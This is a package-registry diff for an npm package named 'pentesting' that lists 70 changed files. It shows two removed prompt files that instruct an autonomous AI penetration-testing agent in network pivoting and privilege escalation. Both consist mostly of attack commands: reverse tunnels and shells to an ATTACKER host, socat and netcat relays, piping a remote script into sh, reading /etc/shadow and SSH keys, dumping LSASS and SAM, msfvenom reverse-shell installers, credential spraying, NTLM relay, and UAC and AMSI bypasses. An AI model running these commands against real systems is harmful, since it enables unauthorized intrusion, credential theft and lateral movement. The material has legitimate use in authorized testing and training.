pentesting 0.73.14 → 0.90.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70) hide show
  1. package/README.md +119 -49
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-MMDCBQ74.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4KLVUP3C.js +0 -11458
  11. package/dist/chunk-AEQNELCQ.js +0 -5930
  12. package/dist/chunk-YZNPWDNS.js +0 -1166
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9737
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-IGAKJZJ3.js +0 -13
  23. package/dist/process-registry-DNEZX4S5.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,205 +0,0 @@
1
- # Pivoting & Multi-Hop Tunneling — Autonomous Guide
2
-
3
- > **Cross-ref**: lateral.md (movement), ad-attack.md (AD pivoting), network-svc.md (internal services)
4
-
5
- ## Core Principle
6
-
7
- Pivoting = using a compromised host as a relay to reach previously unreachable network segments.
8
- The agent on the **outer host** can only reach the **inner network** through a pivot chain.
9
-
10
- ---
11
-
12
- ## Pivot Decision Tree
13
-
14
- ```
15
- GOT SHELL ON HOST? → Run immediately:
16
- ip a / ifconfig → list interfaces (look for 2+ NICs = pivot candidate)
17
- ip route / route -n → routing table (internal subnets)
18
- arp -a → visible hosts (discovered via ARP)
19
- cat /etc/hosts → hardcoded internal names
20
- netstat -an → internal listening services
21
- ss -tlnp → listening ports (Linux)
22
-
23
- FOUND INTERNAL SUBNET (e.g. 10.10.100.0/24)?
24
- → Port scan via pivot: nmap through socks proxy or chisel
25
- → Identify services → exploit from outer agent via tunnel
26
-
27
- FOUND INTERNAL HOST NAMES?
28
- → DNS resolution from pivot: dig @internal-DNS hostname
29
- → Look for: DC, DB, git, admin, intranet, mail
30
- ```
31
-
32
- ---
33
-
34
- ## Method 1: SSH Tunneling (if SSH available on pivot)
35
-
36
- ```
37
- LOCAL PORT FORWARD — access pivot's localhost from attacker:
38
- ssh -L 8080:127.0.0.1:80 user@PIVOT
39
- → Now: http://localhost:8080 = http://PIVOT:80
40
-
41
- REMOTE PORT FORWARD — expose attacker port through pivot:
42
- ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT
43
- → From PIVOT: nc attacker 4444 reaches attacker's local 4444
44
-
45
- DYNAMIC SOCKS PROXY — route arbitrary traffic through pivot:
46
- ssh -D 1080 user@PIVOT
47
- → proxychains / nmap --proxies socks4://127.0.0.1:1080 INTERNAL_TARGET
48
-
49
- MULTI-HOP (3 hops):
50
- ssh -J user@HOP1,user@HOP2 user@FINAL_TARGET
51
- ssh -L 8080:INTERNAL:80 -J user@HOP1 user@HOP2
52
- ```
53
-
54
- ---
55
-
56
- ## Method 2: Chisel (No SSH Required — TCP over HTTP)
57
-
58
- ```
59
- ATTACKER SIDE (server):
60
- chisel server --port 8080 --reverse
61
-
62
- PIVOT SIDE (client — upload chisel binary):
63
- chisel client ATTACKER:8080 R:socks → SOCKS5 on attacker:1080
64
- chisel client ATTACKER:8080 R:4444:10.10.100.5:22 → forward specific port
65
-
66
- MULTI-HOP chisel:
67
- HOP1 connects to attacker → SOCKS on attacker:1080
68
- HOP2 connects to HOP1 via proxychains → SOCKS chain
69
-
70
- USAGE with proxychains:
71
- echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
72
- proxychains nmap -sT -Pn -p 22,80,443,445,3389 10.10.100.0/24
73
- proxychains evil-winrm -i 10.10.100.5 -u admin -p pass
74
- ```
75
-
76
- ---
77
-
78
- ## Method 3: Ligolo-ng (Kernel TUN — fastest, cleanest)
79
-
80
- ```
81
- ATTACKER (proxy):
82
- sudo ip tuntap add user $USER mode tun ligolo
83
- sudo ip link set ligolo up
84
- ./proxy -selfcert
85
-
86
- PIVOT (agent — upload binary):
87
- ./agent -connect ATTACKER:11601 -ignore-cert
88
-
89
- ATTACKER — after agent connects:
90
- session → select agent
91
- listener_add --addr 0.0.0.0:1234 --to 10.10.100.5:22 → port forward
92
- start → add route: sudo ip route add 10.10.100.0/24 dev ligolo
93
- → Now: ssh admin@10.10.100.5 directly (no proxychains!)
94
-
95
- MULTI-HOP with ligolo:
96
- Agent on HOP1 → reach HOP2 network
97
- Upload agent to HOP2 → connect through ligolo listener on HOP1
98
- web_search("ligolo-ng double pivot setup multi-hop")
99
- ```
100
-
101
- ---
102
-
103
- ## Method 4: Metasploit Route / SOCKS
104
-
105
- ```
106
- meterpreter session on pivot:
107
- background
108
- use post/multi/manage/autoroute
109
- set SESSION 1 → run
110
-
111
- Then:
112
- use auxiliary/server/socks_proxy → set VERSION 5 → run
113
- → proxychains through Metasploit SOCKS on 127.0.0.1:1080
114
-
115
- portfwd in meterpreter:
116
- portfwd add -l 3389 -p 3389 -r INTERNAL_HOST
117
- → rdesktop localhost:3389
118
- ```
119
-
120
- ---
121
-
122
- ## Method 5: Netcat / Socat Relay (No binary upload — abuse existing tools)
123
-
124
- ```
125
- NETCAT RELAY (if mkfifo available):
126
- mkfifo /tmp/pipe
127
- nc -l -p 4444 < /tmp/pipe | nc INTERNAL_TARGET 22 > /tmp/pipe
128
-
129
- SOCAT RELAY:
130
- socat TCP-LISTEN:4444,fork TCP:INTERNAL_TARGET:22
131
- → Persistent relay: socat TCP-LISTEN:4444,fork,reuseaddr TCP:TARGET:22
132
-
133
- SOCAT SOCKS PROXY (if socat version supports it):
134
- socat TCP-LISTEN:1080,fork SOCKS4A:localhost:INTERNAL_HOST:PORT,socksport=1080
135
- ```
136
-
137
- ---
138
-
139
- ## Internal Network Scanning via Pivot
140
-
141
- ```
142
- VIA PROXYCHAINS (any pivot method):
143
- proxychains nmap -sT -Pn -p 22,80,443,445,1433,3306,3389,5985,6379,8080 INTERNAL/24
144
- proxychains nmap -sT -Pn --top-ports 100 INTERNAL/24
145
-
146
- BASH PING SWEEP (when no tools):
147
- for i in $(seq 1 254); do ping -c1 -W1 10.10.100.$i &>/dev/null && echo "10.10.100.$i UP"; done
148
-
149
- BASH PORT SCAN (when no tools):
150
- for port in 22 80 443 445 3389 5985; do
151
- (echo >/dev/tcp/10.10.100.5/$port) 2>/dev/null && echo "$port OPEN"
152
- done
153
- ```
154
-
155
- ---
156
-
157
- ## Reverse Shell Through Pivot
158
-
159
- ```
160
- DOUBLE PIVOT — get shell from deep internal host back to outside:
161
-
162
- Method A: Chisel reverse
163
- Outer SOCKS → proxychains + outer listener
164
- Inner host connects outbound (if egress allowed):
165
- chisel client ATTACKER:8080 R:4445:127.0.0.1:4445
166
-
167
- Method B: Meterpreter bind shell
168
- proxychains exploit/multi/handler (PAYLOAD: bind_tcp on INTERNAL_HOST)
169
- lhost=INTERNAL_HOST → proxychains connect inbound
170
-
171
- Method C: SSH -R through existing session
172
- From inner host: ssh -R 9001:127.0.0.1:9001 pivot_user@PIVOT
173
- From attacker: nc PIVOT:9001
174
-
175
- Reverse shell via proxy (if internal host has egress):
176
- → Set attacker IP as destination (should reach PIVOT, then routed back)
177
- → Verify connectivity: proxychains curl http://ATTACKER:8080/test
178
- ```
179
-
180
- ---
181
-
182
- ## Credential Spray Across Pivoted Networks
183
-
184
- ```
185
- Once you have credentials from the outer network → always spray internally:
186
- proxychains crackmapexec smb 10.10.100.0/24 -u user -p pass --continue-on-success
187
- proxychains crackmapexec winrm 10.10.100.0/24 -u user -p pass
188
- proxychains impacket-psexec DOMAIN/user:pass@INTERNAL_HOST
189
-
190
- Credential relay internally:
191
- proxychains impacket-ntlmrelayx -t INTERNAL_TARGET -smb2support
192
- Coerce auth from pivot: PetitPotam, PrinterBug, MS-RPRN
193
- ```
194
-
195
- ---
196
-
197
- ## Search Patterns
198
-
199
- ```
200
- web_search("chisel multi-hop pivot {year}")
201
- web_search("ligolo-ng double pivot internal network")
202
- web_search("proxychains nmap internal network scanning")
203
- web_search("pivot {OS} tunneling no binary upload")
204
- web_search("reverse shell through pivot NAT traversal")
205
- ```
@@ -1,190 +0,0 @@
1
- # Privilege Escalation — Comprehensive Autonomous Guide
2
-
3
- > **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
4
- > Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
5
- > to decide what to test and in what order. Adapt dynamically — not to this list.
6
-
7
- > **Cross-ref**: shells.md (shell access), post.md (post-exploitation), lateral.md (lateral movement)
8
-
9
- ## Core Principle
10
- Initial access is usually low-privileged. Privesc is MANDATORY.
11
- There are hundreds of privesc vectors — automated tools + manual checks + SEARCH.
12
-
13
- ## 🐧 Linux Privilege Escalation
14
-
15
- ### Automated Enumeration (RUN FIRST)
16
- ```
17
- ALWAYS run automated enumeration:
18
- ├── LinPEAS: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
19
- ├── LinEnum: web_search("linenum github") → download and run
20
- ├── linux-exploit-suggester: web_search("linux exploit suggester github")
21
- ├── pspy: monitor processes without root (cron jobs, other users' commands)
22
- └── If tools can't be transferred: run commands manually (see below)
23
- ```
24
-
25
- ### Manual Privesc Vector Map
26
- ```
27
- LINUX PRIVESC CATEGORIES:
28
-
29
- ├── 1. Kernel Exploits
30
- │ ├── uname -a → kernel version
31
- │ ├── web_search("linux kernel {version} privilege escalation exploit")
32
- │ ├── searchsploit linux kernel {version}
33
- │ └── Dirty COW, Dirty Pipe, OverlayFS, etc.
34
-
35
- ├── 2. SUID/SGID Binaries
36
- │ ├── find / -perm -4000 -type f 2>/dev/null (SUID)
37
- │ ├── find / -perm -2000 -type f 2>/dev/null (SGID)
38
- │ ├── For EACH found binary: check GTFOBins
39
- │ │ web_search("{binary_name} gtfobins")
40
- │ ├── Custom SUID binaries: strings, ltrace, strace → find vulnerability
41
- │ └── Known exploitable SUID: nmap, vim, python, find, bash, cp, mv, etc.
42
-
43
- ├── 3. Sudo Misconfiguration
44
- │ ├── sudo -l (list what current user can sudo)
45
- │ ├── (ALL, !root) → CVE-2019-14287: sudo -u#-1 /bin/bash
46
- │ ├── NOPASSWD entries → check GTFOBins for each allowed command
47
- │ ├── sudo version: sudo --version → web_search("sudo {version} CVE")
48
- │ ├── LD_PRELOAD/LD_LIBRARY_PATH in env_keep → shared library injection
49
- │ └── web_search("sudo {command} privilege escalation gtfobins")
50
-
51
- ├── 4. Cron Jobs
52
- │ ├── cat /etc/crontab, ls -la /etc/cron.*, crontab -l
53
- │ ├── Writable cron scripts → replace with reverse shell
54
- │ ├── Wildcard injection: if cron uses * → inject flag files
55
- │ │ tar: --checkpoint + --checkpoint-action=exec=sh
56
- │ │ rsync: -e "sh shell.sh"
57
- │ ├── PATH exploitation: cron PATH writable → place malicious binary first
58
- │ └── pspy to discover hidden cron jobs and service activity
59
-
60
- ├── 5. Capabilities
61
- │ ├── getcap -r / 2>/dev/null
62
- │ ├── Exploitable: cap_setuid, cap_dac_override, cap_sys_admin, cap_net_raw
63
- │ ├── Python with cap_setuid: python -c 'import os; os.setuid(0); os.system("/bin/bash")'
64
- │ └── web_search("{binary} {capability} privilege escalation")
65
-
66
- ├── 6. Writable Files/Directories
67
- │ ├── /etc/passwd writable → add root user (openssl passwd -1 -salt xyz password)
68
- │ ├── /etc/shadow readable → crack hashes (hashcat/john)
69
- │ ├── .bashrc/.profile of other users → inject commands
70
- │ ├── Service config files → modify service to run as root
71
- │ ├── init scripts/systemd services writable → modify ExecStart
72
- │ └── find / -writable -type f 2>/dev/null | grep -v proc
73
-
74
- ├── 7. Path Hijacking
75
- │ ├── echo $PATH → are writable dirs BEFORE system dirs?
76
- │ ├── Service/script calls command without absolute path → create in writable dir
77
- │ ├── LD_LIBRARY_PATH → shared library hijacking
78
- │ └── Python library path → create malicious module with same name
79
-
80
- ├── 8. NFS Misconfiguration
81
- │ ├── cat /etc/exports → look for no_root_squash
82
- │ ├── Mount from attacker → create SUID binary → execute on target
83
- │ └── Web_search("NFS no_root_squash privilege escalation")
84
-
85
- ├── 9. Docker/Container Escape
86
- │ ├── In docker group? → docker run -v /:/mnt --rm -it alpine chroot /mnt sh
87
- │ ├── Privileged container? → mount /dev/sda1 /mnt → access host filesystem
88
- │ ├── Docker socket mounted? → full host access
89
- │ ├── cap_sys_admin → mount cgroup + notify_on_release → execute on host
90
- │ └── web_search("docker container escape privilege escalation {year}")
91
-
92
- ├── 10. Sensitive Information
93
- │ ├── grep -r "password" /var/www/ /opt/ /home/ /etc/ 2>/dev/null
94
- │ ├── .env files, config files, database connection strings
95
- │ ├── .bash_history, .mysql_history, .sh_history
96
- │ ├── SSH keys: find / -name "id_rsa" -o -name "*.pem" 2>/dev/null
97
- │ ├── Stored credentials: /var/www/html/wp-config.php, .git/config
98
- │ └── Internal services with credentials → pivot to higher-priv user
99
-
100
- └── 11. Miscellaneous
101
- ├── Shared library injection via writable .so files
102
- ├── AppArmor/SELinux misconfiguration → bypass
103
- ├── dbus exploitation
104
- ├── Polkit vulnerabilities (CVE-2021-4034 pkexec, CVE-2021-3560)
105
- └── web_search("linux privilege escalation {year} new techniques")
106
- ```
107
-
108
- ## 🪟 Windows Privilege Escalation
109
-
110
- ### Automated Enumeration
111
- ```
112
- ├── WinPEAS: upload and run (or run from memory via PowerShell)
113
- ├── PowerUp.ps1: Invoke-AllChecks
114
- ├── Seatbelt.exe: comprehensive security enumeration
115
- ├── SharpUp.exe: check for common privesc vectors
116
- └── windows-exploit-suggester: compare systeminfo output
117
- ```
118
-
119
- ### Manual Privesc Vector Map
120
- ```
121
- WINDOWS PRIVESC CATEGORIES:
122
-
123
- ├── 1. Kernel Exploits
124
- │ ├── systeminfo → OS version + patch level
125
- │ ├── web_search("windows {version} {build} privilege escalation exploit")
126
- │ ├── windows-exploit-suggester --update --systeminfo sysinfo.txt
127
- │ └── Notable: PrintNightmare, HiveNightmare, EternalBlue, JuicyPotato, etc.
128
-
129
- ├── 2. Service Exploits
130
- │ ├── Unquoted service paths: wmic service get name,pathname | findstr /i "C:"
131
- │ ├── Weak service permissions: sc qc <service>, accesschk.exe
132
- │ ├── Service binary replacement: replace binary of service running as SYSTEM
133
- │ ├── DLL Hijacking: missing DLL → place malicious DLL in search path
134
- │ └── Registry permissions: writable service registry keys
135
-
136
- ├── 3. Token Impersonation
137
- │ ├── SeImpersonatePrivilege → JuicyPotato/PrintSpoofer/GodPotato
138
- │ ├── SeAssignPrimaryTokenPrivilege → token manipulation
139
- │ ├── whoami /priv → check all privileges
140
- │ └── web_search("windows token impersonation SeImpersonate exploit {year}")
141
-
142
- ├── 4. AlwaysInstallElevated
143
- │ ├── Check: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
144
- │ ├── If enabled → create malicious .msi → runs as SYSTEM
145
- │ └── msfvenom -p windows/shell_reverse_tcp ... -f msi > evil.msi
146
-
147
- ├── 5. Stored Credentials
148
- │ ├── cmdkey /list → stored credentials
149
- │ ├── runas /savecred /user:admin "cmd /c reverse_shell.exe"
150
- │ ├── SAM/SYSTEM backup files → dump hashes
151
- │ ├── LSASS dump: mimikatz, Task Manager, procdump
152
- │ ├── Registry: reg save HKLM\SAM sam, reg save HKLM\SYSTEM system
153
- │ ├── Credential Manager, DPAPI protected blobs
154
- │ └── web_search("windows credential extraction techniques {year}")
155
-
156
- ├── 6. Scheduled Tasks
157
- │ ├── schtasks /query /fo LIST /v
158
- │ ├── Writable task scripts → replace with malicious code
159
- │ ├── Writable task binary paths → replace binary
160
- │ └── Missing binaries → create malicious binary at expected path
161
-
162
- ├── 7. Registry Exploits
163
- │ ├── AutoRun: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
164
- │ ├── Writable registry keys → modify
165
- │ └── AppInit_DLLs, Image File Execution Options
166
-
167
- ├── 8. UAC Bypass
168
- │ ├── web_search("UAC bypass technique {year}")
169
- │ ├── fodhelper.exe bypass, eventvwr.exe bypass
170
- │ ├── DLL side-loading in auto-elevated processes
171
- │ └── UACME github → comprehensive UAC bypass collection
172
-
173
- └── 9. Miscellaneous
174
- ├── AMSI bypass → web_search("AMSI bypass {year}")
175
- ├── AppLocker bypass → web_search("AppLocker bypass {year}")
176
- ├── Network credential sniffing (Responder, Inveigh)
177
- ├── Clipboard monitoring for passwords
178
- └── web_search("windows privilege escalation {year} new techniques")
179
- ```
180
-
181
- ## Universal Privesc Search Pattern
182
- ```
183
- 1. What OS/version? → web_search("{OS} {version} privilege escalation")
184
- 2. What services? → web_search("{service} privilege escalation")
185
- 3. What binaries? → web_search("{binary} gtfobins") OR web_search("{binary} lolbas")
186
- 4. What's misconfigured? → interpret LinPEAS/WinPEAS output
187
- 5. What's writable? → modify writable files/services for shell execution
188
- 6. What credentials? → crack, spray, or reuse found credentials
189
- 7. Still stuck? → web_search("{kernel_version} exploit CVE PoC")
190
- ```